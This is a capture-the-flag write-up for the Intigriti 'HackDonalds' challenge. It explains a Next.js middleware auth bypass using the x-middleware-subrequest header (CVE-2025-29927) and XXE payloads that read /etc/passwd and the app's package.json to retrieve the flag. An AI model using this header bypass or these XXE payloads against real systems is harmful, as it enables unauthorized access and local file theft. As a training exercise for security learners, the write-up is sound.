🧠
Intigriti Monthly Challenges
Intigriti
  • Homepage
  • 0525: Confetti
  • 0425: HackDonalds
  • 0325: Leaky Flagment
  • 0125: Particle Generator
  • 1224: Fireplace Generator
  • 1124: 1337UP LIVE CTF
  • 0824: Safe Notes
  • 0724: Memo Sharing
  • 0524: Quadratic Equation Solver
  • 0424: BarSpacing Skills
  • 0324: Contact Form
  • 0224: Love Letter
  • 0124: Repo Woes
  • 1223: Smartypants Revenge
  • 1123: 1337UP LIVE CTF
  • 1023: Pseudonym Generator
  • 0923: Secure Database
  • 0823: Pure Functional Math Calculator
  • 0723: Video-to-Audio Converter
  • 0623: Protocapture
  • 0523: It’s Fun to Review the E.C.M.A
  • 0423: We Like to Sell Bricks
  • 0323: Incomplete Secure Notes Application
  • 0223: Leek NFT
  • 0123: Friends Search Engine
  • 1222: Christmas Blog
  • 1122: Secure Vault
  • 1022: Secure Notes
  • 0922: 8 Ball
  • 0822: Business Card Generator
  • 0722: Awesome Kitty Blog
  • 0622: Recipe
  • 0522: Pollution
  • 0422: Window Maker
  • 0322: Hashing
  • 0222: Extremely Short Scripting Game
  • 0122: Super Secure HTML Viewer
  • 1221: Christmas Special
  • 1121: OWASP Top 10
  • 1021: Halloween Has Taken Over
  • 0921: Password Manager
  • 0821: XSS Cookbook
Powered by GitBook
On this page
  • Challenge Description
  • Useful Resources
  • Solution
  • Recon
  • Next.js Middleware Auth Bypass (CVE-2025-29927)
  • XML External Entity Injection (XXE)
  • Community Writeups

0425: HackDonalds

Writeup for the Intigriti April 2024 challenge πŸ’₯

Previous0525: ConfettiNext0325: Leaky Flagment

Last updated 1 month ago

Name
Authors
Category

NextJS Middleware Auth Bypass, CVE-2025-29927, XXE

Challenge Description

Find the FLAG and win Intigriti swag! πŸ†

Useful Resources

Solution

Bastien (BAS10) made most of this challenge. I (CryptoCat) just made the UI cough ChatGPT cough and fixed a few bugs/unintended solutions. It's a lot easier than the typical Intigriti monthly challenge - thankfully, as it came only a week after the crazy chain by 0x999 in the . Therefore, this one was run more informally, without all the usual prizes, promo, domain name etc.

Recon

The challenge did not come with source code, so we must follow a black box approach.

Site Functionality

The website doesn't appear to have a lot of functionality; there's a homepage and a food menu.

There's also an admin section which, as hackers, should be interesting to us.

We might try some basic SQLi, default/common password etc. However, it will get us nowhere. Digging into the client-side code is also fairly unproductive - since it's a NextJS application, the code is hard to read and most of the important stuff is on the server-side.

Back to the advisory:

CVE-2025-29927 affects all Next.js versions from 11.1.4 up to 15.1.7 and allows middleware bypass via a specially crafted x-middleware-subrequest header.

Vulnerability confirmed βœ…

Next.js Middleware Auth Bypass (CVE-2025-29927)

Middleware in Next.js is commonly used for:

  • Authentication / Authorization

  • Rewrites / Redirects

  • Adding security headers (CSP, etc.)

This vulnerability allows attackers to bypass middleware protections entirely, leading to:

  • Authorization bypass

  • Content Security Policy (CSP) bypass

  • DoS via Cache Poisoning (CPDoS)

An auth bypass would be perfect for us! Maybe it can get us into the admin panel without knowing the password?

Let's request the /admin page while including the following HTTP header.

x-middleware-subrequest: middleware

Easy! Now we just need to include this header on each request to maintain our access 😎

We can only click on the Ice Cream Machines option, which allows us to view the settings of various machines (notoriously buggy/broken at HackDonalds πŸ‘€)

XML External Entity Injection (XXE)

So, what do we have here? An XML config input that can be parsed.

Any CTF player or bug bounty hunter should know what to check for here; XXE πŸ‘‡

XXE (XML External Entity) is a vulnerability that occurs when an XML parser processes external entities defined in XML documents. If not properly configured, it can be exploited to:

  • Read local files (file:///etc/passwd)

  • Perform SSRF (e.g., hitting internal services)

  • DoS via "billion laughs" attack

  • Exfiltrate data via out-of-band channels (OAST, DNS, etc.)

If we replace the parsed input with a payload to read /etc/passwd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>

We successfully retrieve the file contents!

Local File Read (Source Code Disclosure)

Where is the flag though? In a real world scenario, we might look for common files of interest (plenty of wordlists online). Since we know this is a NextJS app, why don't we ask ChatGPT what the common location is and what interesting files it might have?

Nice, so we can try enumerating all of these files starting with the /app/ directory 😼

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///app/package.json">
]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>

There we have our flag: INTIGRITI{XXE_1n_Ic3Cr34m_M4ch1n3s} 🚩

Some players retrieved the same file from /proc/self/cwd/package.json or simply package.json

Community Writeups

+

Wait, NextJS? Wasn't there some discovered for it recently πŸ€” Let's check the version with Wappalyzer πŸ‘€

crazy vulns
r0guebyte
excile
gurux090
wa1m3im
optybg
gilsgil
boffman
harshilsecops
ruur
nagasaikiran
khandlq
priesthood_singh
mami
roys
cybersecu
juniorbrets
rishal865
vilz
cybrik
cybercrusader
Intigriti April Challenge (2024)
Bastien
CryptoCat
Next.js Middleware Auth Bypass (CVE-2025-29927)
XML External Entity Injection (XXE)
March '25 challenge